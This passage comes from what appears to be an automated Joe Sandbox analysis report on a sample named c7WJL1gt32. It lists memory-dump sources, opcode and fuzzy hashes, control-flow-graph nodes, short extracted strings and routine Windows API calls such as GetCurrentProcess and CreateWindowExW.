                                                                                                          • Opcode ID: 49a0412eae5ef89679738ef4b7f11c7f56dd8a75ec13c10d4bb1214433a9a47e
                                                                                                          • Instruction ID: 4b1cd5670288a6eb93246e0360428019ba16374627fe0b578f56824eca2a2090
                                                                                                          • Opcode Fuzzy Hash: 49a0412eae5ef89679738ef4b7f11c7f56dd8a75ec13c10d4bb1214433a9a47e
                                                                                                          • Instruction Fuzzy Hash: C2A191B4E012188FEB58DF6AC944B9DBBF2BF89300F54D0AAD809A7255DB345A85CF11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bf9fbba6278f04c68032365ffdd2e9b369a90a431889d1e49984473ddc16a77b
                                                                                                          • Instruction ID: 0f12cf7b62dab32703bdf27a863accff7c71fa6f096cdebebe6e2d9bb32c282b
                                                                                                          • Opcode Fuzzy Hash: bf9fbba6278f04c68032365ffdd2e9b369a90a431889d1e49984473ddc16a77b
                                                                                                          • Instruction Fuzzy Hash: 849100B4D00218CFEB10DFA9D988B9CBBB1FF49315F209269E509BB291DB749985CF14
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1bd86ba14cfc708d9e35db34688bf60b9d73e70976d189c5ef2938eec4d3c67e
                                                                                                          • Instruction ID: 4127fd38b7631fd66d7e31d798b5dfe2a74e9389d1cc794c49efea41b7aa536e
                                                                                                          • Opcode Fuzzy Hash: 1bd86ba14cfc708d9e35db34688bf60b9d73e70976d189c5ef2938eec4d3c67e
                                                                                                          • Instruction Fuzzy Hash: E581D374E01608CBDB18EFAAD99069DBBF2BF88710F24D529E814AB358DB345942CB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8c51498d4512b4a5157266796441f8202d99c27d52f5ac802e5d3027e3349186
                                                                                                          • Instruction ID: 6747566021e84026731b0b3f96f392b4c80951ce11b2f4fe3af0d571532ddedb
                                                                                                          • Opcode Fuzzy Hash: 8c51498d4512b4a5157266796441f8202d99c27d52f5ac802e5d3027e3349186
                                                                                                          • Instruction Fuzzy Hash: 5A71B375D01228CFDB68DF6AC9807DDBBB2BB89701F1090AAD409A7354DB349E86CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 882cb911b999c2fe7997a24d3f17df37370a9ab74ecf7544e5bc5097e1c89b19
                                                                                                          • Instruction ID: b11554cccb8fc24dd243eed3bc6faa957ed7daa803efbaa6f58ff8cb7eb8c89e
                                                                                                          • Opcode Fuzzy Hash: 882cb911b999c2fe7997a24d3f17df37370a9ab74ecf7544e5bc5097e1c89b19
                                                                                                          • Instruction Fuzzy Hash: 0E7183B4E01618CFEB58CF6AC944B9DBAF2AF88300F14C1AAD40DB7255DB745A85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7b5b265c0dcb739374bc832221a8f8ab31030a21e6ecc0f6dcc1addb1e000023
                                                                                                          • Instruction ID: 3bfeef8bbf4e0bc5cff37d9479409b70226e7408f60412811d3c58106225f88c
                                                                                                          • Opcode Fuzzy Hash: 7b5b265c0dcb739374bc832221a8f8ab31030a21e6ecc0f6dcc1addb1e000023
                                                                                                          • Instruction Fuzzy Hash: F87183B4E006588FEB58CF6AC944B9DBBF2AF88300F14C1AAD40DA7255DB344A85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0725e2cab70b74bfb8a460dc62f2a4f40dfe0d88e305e9add96f7e8b45054672
                                                                                                          • Instruction ID: be1db62ae5ddd34a0d7d874ab50ed4801d295475428cba1628244caa64ba71e3
                                                                                                          • Opcode Fuzzy Hash: 0725e2cab70b74bfb8a460dc62f2a4f40dfe0d88e305e9add96f7e8b45054672
                                                                                                          • Instruction Fuzzy Hash: F2419DB1E016188BEB58CF6BC9557D9FAF3AFC8300F54C1AAC50CA7265DB744A868F50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8734563e268974174b08860a75dec0905a374ad5a702c3cf65b87fdf5d1d82a7
                                                                                                          • Instruction ID: edd424bd270f11322e872c6c3c2bb82e6018d3325c6549de4d9be327e925e9d8
                                                                                                          • Opcode Fuzzy Hash: 8734563e268974174b08860a75dec0905a374ad5a702c3cf65b87fdf5d1d82a7
                                                                                                          • Instruction Fuzzy Hash: BB414AB1E016188BEB58CF6BC9457D9FAF3AFC9310F14C1AAD50CA6264DB744A868F50

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 362 1568e5-1568f9 470 1568fb call 156c98 362->470 471 1568fb call 156c88 362->471 363 156901-156911 364 156917-15691a 363->364 365 156b06-156b0a 363->365 368 156924-156927 364->368 369 15691c-156922 364->369 366 156b10-156b16 365->366 367 156c2f 365->367 370 156b1c-156b20 366->370 371 15682f-156838 366->371 379 156c34-156c4d 367->379 368->367 372 15692d-156930 368->372 369->368 369->372 375 156b22-156b36 370->375 376 156b39-156b47 370->376 373 156847-156853 371->373 374 15683a-15683f 371->374 377 156932-156936 372->377 378 156938-15693b 372->378 373->379 380 156859-15685f 373->380 374->373 387 156b49-156b5e 376->387 388 156bb8-156bcd 376->388 377->378 381 156941-156945 377->381 378->367 378->381 380->365 383 156865-156875 380->383 381->367 386 15694b-156951 381->386 396 156877-156887 383->396 397 156889-15688b 383->397 389 156957-156982 call 156500 * 2 386->389 390 1568b2-1568c3 386->390 402 156b65-156b72 387->402 403 156b60-156b63 387->403 404 156bd4-156be1 388->404 405 156bcf-156bd2 388->405 417 156a6c-156a86 389->417 418 156988-15698c 389->418 390->379 392 1568c9-1568db 390->392 392->379 395 1568e1 392->395 395->362 401 15688e-156894 396->401 397->401 401->365 408 15689a-1568a9 401->408 409 156b74-156bb5 402->409 403->409 410 156be3-156c1e 404->410 405->410 408->389 411 1568af 408->411 436 156c25-156c2c 410->436 411->390 417->370 439 156a8c-156a90 417->439 418->365 421 156992-156996 418->421 423 1569be-1569c4 421->423 424 156998-1569a5 421->424 425 1569c6-1569ca 423->425 426 1569ff-156a05 423->426 442 1569b4 424->442 443 1569a7-1569b2 424->443 425->426 429 1569cc-1569d5 425->429 430 156a07-156a0b 426->430 431 156a11-156a17 426->431 434 1569e4-1569fa 429->434 435 1569d7-1569dc 429->435 430->431 430->436 440 156a23-156a25 431->440 441 156a19-156a1d 431->441 434->365 435->434 444 156a92-156a9c call 1553a8 439->444 445 156acc-156ad0 439->445 446 156a27-156a30 440->446 447 156a5a-156a5c 440->447 441->365 441->440 448 1569b6-1569b8 442->448 443->448 444->445 459 156a9e-156ab3 444->459 445->436 451 156ad6-156ada 445->451 454 156a32-156a37 446->454 455 156a3f-156a55 446->455 447->365 449 156a62-156a69 447->449 448->365 448->423 451->436 456 156ae0-156aed 451->456 454->455 455->365 462 156afc 456->462 463 156aef-156afa 456->463 459->445 467 156ab5-156aca 459->467 464 156afe-156b00 462->464 463->464 464->365 464->436 467->370 467->445 470->363 471->363
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (okq$(okq$(okq$,oq$,oq
                                                                                                          • API String ID: 0-3760967313
                                                                                                          • Opcode ID: 57f537a744f82d6fb494990adee1b3bcc0090e6e2d110fd6d22bcf85aac33a25
                                                                                                          • Instruction ID: 8ee5c343ebd5ef232c2785279252c3e9b2782d47cf22fe21cafc1dd0ba75afaa
                                                                                                          • Opcode Fuzzy Hash: 57f537a744f82d6fb494990adee1b3bcc0090e6e2d110fd6d22bcf85aac33a25
                                                                                                          • Instruction Fuzzy Hash: A0D15B30A00248CFCB25CF69C594AAEBBF2FF48315F558559E869DB261D730ED89CB90

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 518 38330970-38330a0f GetCurrentProcess 522 38330a11-38330a17 518->522 523 38330a18-38330a4c GetCurrentThread 518->523 522->523 524 38330a55-38330a89 GetCurrentProcess 523->524 525 38330a4e-38330a54 523->525 526 38330a92-38330aaa 524->526 527 38330a8b-38330a91 524->527 525->524 539 38330aad call 38330f31 526->539 540 38330aad call 38330b4f 526->540 527->526 531 38330ab3-38330ae2 GetCurrentThreadId 532 38330ae4-38330aea 531->532 533 38330aeb-38330b4d 531->533 532->533 539->531 540->531
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 383309FE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 38330A3B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 38330A78
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 38330AD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980347566.0000000038330000.00000040.00000800.00020000.00000000.sdmp, Offset: 38330000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38330000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 1deb3e21f3c9f31893351163544e50e3b21d981c515441b7ca0d1a8882e8322c
                                                                                                          • Instruction ID: 63d3424ed8321dd0917f544343fa8bc95b40279894b057e99070ecdac0ab0ad3
                                                                                                          • Opcode Fuzzy Hash: 1deb3e21f3c9f31893351163544e50e3b21d981c515441b7ca0d1a8882e8322c
                                                                                                          • Instruction Fuzzy Hash: F45155B49012499FDB04CFA9D558BDEBBF1AF88304F20C469E099A7361DB789980CF65

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 541 38330980-38330a0f GetCurrentProcess 545 38330a11-38330a17 541->545 546 38330a18-38330a4c GetCurrentThread 541->546 545->546 547 38330a55-38330a89 GetCurrentProcess 546->547 548 38330a4e-38330a54 546->548 549 38330a92-38330aaa 547->549 550 38330a8b-38330a91 547->550 548->547 562 38330aad call 38330f31 549->562 563 38330aad call 38330b4f 549->563 550->549 554 38330ab3-38330ae2 GetCurrentThreadId 555 38330ae4-38330aea 554->555 556 38330aeb-38330b4d 554->556 555->556 562->554 563->554
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 383309FE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 38330A3B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 38330A78
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 38330AD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980347566.0000000038330000.00000040.00000800.00020000.00000000.sdmp, Offset: 38330000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38330000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: f479694389a30dc46c5c64c0c44c7860013ce0e89165d5fddf424180eddbf22f
                                                                                                          • Instruction ID: e600d0057d78f6695e11a3b17a5ca089cad0b0161b93f6602a31de386459cfd4
                                                                                                          • Opcode Fuzzy Hash: f479694389a30dc46c5c64c0c44c7860013ce0e89165d5fddf424180eddbf22f
                                                                                                          • Instruction Fuzzy Hash: FF5154B09012498FDB04CFAAD558BDEBBF1EF88304F20C429E459A7361DB789980CF65

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1048 383301c8-38330232 CreateWindowExW 1050 38330234-3833023a 1048->1050 1051 3833023b-38330273 1048->1051 1050->1051 1055 38330280 1051->1055 1056 38330275-38330278 1051->1056 1057 38330281 1055->1057 1056->1055 1057->1057
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,0000000C,?,?,?), ref: 38330222
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980347566.0000000038330000.00000040.00000800.00020000.00000000.sdmp, Offset: 38330000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38330000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateWindow
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 716092398-4108050209
                                                                                                          • Opcode ID: 9d8deacd8b51ed8a856f54da78b089773f1ed9bfd22b42ef00b8b06989cd9dbe
                                                                                                          • Instruction ID: 8fed9c326ae10017cf16ddc7e2eabd0c764565008aae7b41bd36362b8777b540
                                                                                                          • Opcode Fuzzy Hash: 9d8deacd8b51ed8a856f54da78b089773f1ed9bfd22b42ef00b8b06989cd9dbe
                                                                                                          • Instruction Fuzzy Hash: B721D07580025CEFDF01DFD4C994ADEBBB5BF08304F208149E908AB260C7B59885CF60

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1058 157458-157946 1133 15794c-15795c 1058->1133 1134 157e98-157ecd 1058->1134 1133->1134 1135 157962-157972 1133->1135 1138 157ecf-157ed4 1134->1138 1139 157ed9-157ef7 1134->1139 1135->1134 1137 157978-157988 1135->1137 1137->1134 1140 15798e-15799e 1137->1140 1141 157fbe-157fc3 1138->1141 1152 157f6e-157f7a 1139->1152 1153 157ef9-157f03 1139->1153 1140->1134 1142 1579a4-1579b4 1140->1142 1142->1134 1144 1579ba-1579ca 1142->1144 1144->1134 1145 1579d0-1579e0 1144->1145 1145->1134 1147 1579e6-1579f6 1145->1147 1147->1134 1148 1579fc-157a0c 1147->1148 1148->1134 1149 157a12-157a22 1148->1149 1149->1134 1151 157a28-157e97 1149->1151 1158 157f91-157f9d 1152->1158 1159 157f7c-157f88 1152->1159 1153->1152 1157 157f05-157f11 1153->1157 1164 157f36-157f39 1157->1164 1165 157f13-157f1e 1157->1165 1168 157fb4-157fb6 1158->1168 1169 157f9f-157fab 1158->1169 1159->1158 1167 157f8a-157f8f 1159->1167 1170 157f50-157f5c 1164->1170 1171 157f3b-157f47 1164->1171 1165->1164 1179 157f20-157f2a 1165->1179 1167->1141 1168->1141 1169->1168 1177 157fad-157fb2 1169->1177 1172 157fc4-157fe6 1170->1172 1173 157f5e-157f65 1170->1173 1171->1170 1183 157f49-157f4e 1171->1183 1184 157ff6 1172->1184 1185 157fe8 1172->1185 1173->1172 1178 157f67-157f6c 1173->1178 1177->1141 1178->1141 1179->1164 1189 157f2c-157f31 1179->1189 1183->1141 1188 157ff8-157ff9 1184->1188 1185->1184 1187 157fef-157ff4 1185->1187 1187->1188 1189->1141
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $kq$$kq
                                                                                                          • API String ID: 0-3550614674
                                                                                                          • Opcode ID: 7c8d87da610300fe605d0f1e5b2425b578f8a9ffbdc6ac0fd360879a6ecf8049
                                                                                                          • Instruction ID: 7fc2b1f6ba1563f237e2b16107840f11cd8eccda5d28c723fe32797d3c9c6277
                                                                                                          • Opcode Fuzzy Hash: 7c8d87da610300fe605d0f1e5b2425b578f8a9ffbdc6ac0fd360879a6ecf8049
                                                                                                          • Instruction Fuzzy Hash: 9C52F074A00218CFEB24DBA4C961B9EBB73EF44300F1081A9D51A6B3A5DF359E89DF51

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1249 1554a8-1554a9 1250 155695-1556cd 1249->1250 1251 1554aa-1554be 1249->1251 1262 1556d6-1556da 1250->1262 1263 1556cf-1556d4 1250->1263 1254 1554c0-1554c3 1251->1254 1255 1554d3-1554d6 1251->1255 1257 1554c5-1554c8 1254->1257 1258 1554e2-1554e8 1254->1258 1255->1258 1259 1554d8-1554db 1255->1259 1266 1554ce 1257->1266 1267 1555c9-1555cf 1257->1267 1264 155500-155515 1258->1264 1265 1554ea-1554f0 1258->1265 1260 1554dd 1259->1260 1261 15552e-155534 1259->1261 1268 1555f4-155601 1260->1268 1274 155536-15553c 1261->1274 1275 15554c-15555e 1261->1275 1269 1556e0-1556e2 1262->1269 1263->1269 1293 15551a-15551d 1264->1293 1270 1554f4-1554fe 1265->1270 1271 1554f2 1265->1271 1266->1268 1272 1555e7-1555f1 1267->1272 1273 1555d1-1555d7 1267->1273 1288 155615-155617 1268->1288 1289 155603-155607 1268->1289 1278 1556e4-1556f6 1269->1278 1279 1556f7-1556fe 1269->1279 1270->1264 1271->1264 1272->1268 1281 1555d9 1273->1281 1282 1555db-1555e5 1273->1282 1276 155540-15554a 1274->1276 1277 15553e 1274->1277 1291 155560-15556c 1275->1291 1292 15556e-155591 1275->1292 1276->1275 1277->1275 1281->1272 1282->1272 1296 15561b-15561e 1288->1296 1289->1288 1295 155609-15560d 1289->1295 1305 1555b9-1555c7 1291->1305 1297 155690 1292->1297 1313 155597-15559a 1292->1313 1302 155526-155529 1293->1302 1295->1297 1298 155613 1295->1298 1296->1297 1299 155620-155623 1296->1299 1297->1250 1298->1296 1303 155629-15562f 1299->1303 1304 15549a-1554a6 1299->1304 1302->1268 1306 155635-155639 1303->1306 1307 155631-155633 1303->1307 1304->1249 1305->1268 1311 155686 1306->1311 1312 15563b-155641 1306->1312 1310 155688-15568f 1307->1310 1311->1310 1312->1297 1315 155643-155646 1312->1315 1313->1297 1314 1555a0-1555b2 1313->1314 1314->1305 1315->1297 1316 155648-15565d 1315->1316 1319 155681-155684 1316->1319 1320 15565f-155665 1316->1320 1319->1310 1321 155677-15567a 1320->1321 1322 155667-155675 1320->1322 1321->1297 1323 15567c-15567f 1321->1323 1322->1297 1322->1321 1323->1319 1323->1320
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,oq$,oq
                                                                                                          • API String ID: 0-3825397795
                                                                                                          • Opcode ID: bc21f12a98f72b1dad712732ecaff9e6d6aa0abf442771a621b0f5d677e6b79b
                                                                                                          • Instruction ID: d3d20eff92062d69f8f365d7ef030971ee1cbee9323bb6561d2c7e041a506db6
                                                                                                          • Opcode Fuzzy Hash: bc21f12a98f72b1dad712732ecaff9e6d6aa0abf442771a621b0f5d677e6b79b
                                                                                                          • Instruction Fuzzy Hash: DA719E34A00945CFCB18CF69C4A49A9B7B3BF88316B658069D826DF365E731EC45CF51

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1365 154f24-154f28 1366 154f50-154f57 1365->1366 1367 154f2a-154f36 1365->1367 1369 154f77-154f80 1366->1369 1370 154f59-154f60 1366->1370 1367->1366 1368 154f38-154f43 1367->1368 1371 154f49-154f4b 1368->1371 1372 154feb-155017 1368->1372 1470 154f82 call 154f24 1369->1470 1471 154f82 call 155068 1369->1471 1370->1369 1373 154f62-154f6d 1370->1373 1375 154fe3-154fe8 1371->1375 1377 15501e-155076 1372->1377 1376 154f73-154f75 1373->1376 1373->1377 1374 154f88-154f8a 1379 154f92-154f9a 1374->1379 1380 154f8c-154f90 1374->1380 1376->1375 1396 155085-155097 1377->1396 1397 155078-15507e 1377->1397 1382 154f9c-154fa1 1379->1382 1383 154fa9-154fab 1379->1383 1380->1379 1381 154fad-154fbe 1380->1381 1472 154fc1 call 155978 1381->1472 1473 154fc1 call 155968 1381->1473 1382->1383 1383->1375 1386 154fc7-154fcc 1389 154fe1 1386->1389 1390 154fce-154fd7 1386->1390 1389->1375 1465 154fd9 call 159fb4 1390->1465 1466 154fd9 call 159ef6 1390->1466 1467 154fd9 call 159f6d 1390->1467 1393 154fdf 1393->1375 1399 15509d-1550a1 1396->1399 1400 15512b-15512d 1396->1400 1397->1396 1401 1550b1-1550be 1399->1401 1402 1550a3-1550af 1399->1402 1468 15512f call 1552c0 1400->1468 1469 15512f call 1552c8 1400->1469 1408 1550c0-1550ca 1401->1408 1402->1408 1403 155135-15513b 1406 155147-15514e 1403->1406 1407 15513d-155143 1403->1407 1409 155145 1407->1409 1410 1551a9-155208 1407->1410 1413 1550f7-1550fb 1408->1413 1414 1550cc-1550db 1408->1414 1409->1406 1425 15520f-155233 1410->1425 1416 155107-15510b 1413->1416 1417 1550fd-155103 1413->1417 1422 1550dd-1550e4 1414->1422 1423 1550eb-1550f5 1414->1423 1416->1406 1419 15510d-155111 1416->1419 1420 155105 1417->1420 1421 155151-1551a2 1417->1421 1424 155117-155129 1419->1424 1419->1425 1420->1406 1421->1410 1422->1423 1423->1413 1424->1406 1433 155235-155237 1425->1433 1434 155239-15523b 1425->1434 1435 1552b1-1552b4 1433->1435 1436 15523d-155241 1434->1436 1437 15524c-15524e 1434->1437 1441 155247-15524a 1436->1441 1442 155243-155245 1436->1442 1443 155261-155267 1437->1443 1444 155250-155254 1437->1444 1441->1435 1442->1435 1448 155292-155294 1443->1448 1449 155269-155290 1443->1449 1445 155256-155258 1444->1445 1446 15525a-15525f 1444->1446 1445->1435 1446->1435 1452 15529b-15529d 1448->1452 1449->1452 1455 1552a3-1552a5 1452->1455 1456 15529f-1552a1 1452->1456 1458 1552a7-1552ac 1455->1458 1459 1552ae 1455->1459 1456->1435 1458->1435 1459->1435 1465->1393 1466->1393 1467->1393 1468->1403 1469->1403 1470->1374 1471->1374 1472->1386 1473->1386
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hoq$Hoq
                                                                                                          • API String ID: 0-3106737575
                                                                                                          • Opcode ID: a2c7caa56c95c6d9ba3cf166d49a47c16b021fcf5c5abbafce15513955739be3
                                                                                                          • Instruction ID: 193ed77a481feb6ede8a8dc6f5833ba107b3872984b1c5b00331f179b97ea263
                                                                                                          • Opcode Fuzzy Hash: a2c7caa56c95c6d9ba3cf166d49a47c16b021fcf5c5abbafce15513955739be3
                                                                                                          • Instruction Fuzzy Hash: CA51BD35308251CFCB159F38C858BAE7BF6BF88306F15442AE8558B291CB35CC89CB91

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1474 3831d548-3831d66d 1493 3831d710-3831d741 1474->1493 1494 3831d673-3831d6b9 1474->1494 1501 3831d747-3831d75e 1493->1501 1499 3831d6c4-3831d70f 1494->1499 1500 3831d6bb-3831d6bf 1494->1500 1500->1499
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'kq$4'kq
                                                                                                          • API String ID: 0-4171853269
                                                                                                          • Opcode ID: e3c9aa91d9e9979bef738f08c1cfd9c49327896e89a38fa03d0cada85fb5d879
                                                                                                          • Instruction ID: 6a9ea6a06c60c72bb1984ebefd7a1a3e123dcb9e3807503c9f0180d25695f5d3
                                                                                                          • Opcode Fuzzy Hash: e3c9aa91d9e9979bef738f08c1cfd9c49327896e89a38fa03d0cada85fb5d879
                                                                                                          • Instruction Fuzzy Hash: 4D518370A002499FCB05EFA9D551AEEBBB2FF85300F1085A5D005BB366DB35AD46CF61
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'kq$4'kq
                                                                                                          • API String ID: 0-4171853269
                                                                                                          • Opcode ID: 3bd7af5a26edca9000b341ae23d8248be09fd9583419c9b48aa7a5378b9e851a
                                                                                                          • Instruction ID: 06aafc5b511c530abb691a9ecff1e4430a9d0ad0d4a513bfff927165766ef2d6
                                                                                                          • Opcode Fuzzy Hash: 3bd7af5a26edca9000b341ae23d8248be09fd9583419c9b48aa7a5378b9e851a
                                                                                                          • Instruction Fuzzy Hash: E4F068353001186FDB181AA59C5497B7ADBEBDC3A1B148439FD19C7391DF76CC4247A0
                                                                                                          APIs
                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 38331E81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980347566.0000000038330000.00000040.00000800.00020000.00000000.sdmp, Offset: 38330000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38330000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallProcWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2714655100-0
                                                                                                          • Opcode ID: 72fa63ac5e850cc74c005dc1de6dbd6961914bf96fbb525b7a4669d013165c15
                                                                                                          • Instruction ID: fe0055f1dcd2fa7f50a8b4fb77e4f23a07f7ccf34fde420989fb928cbf7df09d
                                                                                                          • Opcode Fuzzy Hash: 72fa63ac5e850cc74c005dc1de6dbd6961914bf96fbb525b7a4669d013165c15
                                                                                                          • Instruction Fuzzy Hash: 8C41F5B9900359CFDB14CF99C444A9EBBF5FF88314F24C459E519AB321D775A841CBA0
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38330C4F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980347566.0000000038330000.00000040.00000800.00020000.00000000.sdmp, Offset: 38330000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38330000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: 9d8e8ea6d091c989a2c9aa92f01fc99b5936b9dca1194ca313bb52177d88451a
                                                                                                          • Instruction ID: 74709332974214df17397de03270468bf1fbc397f8bd7196e9410f9acd8c89d2
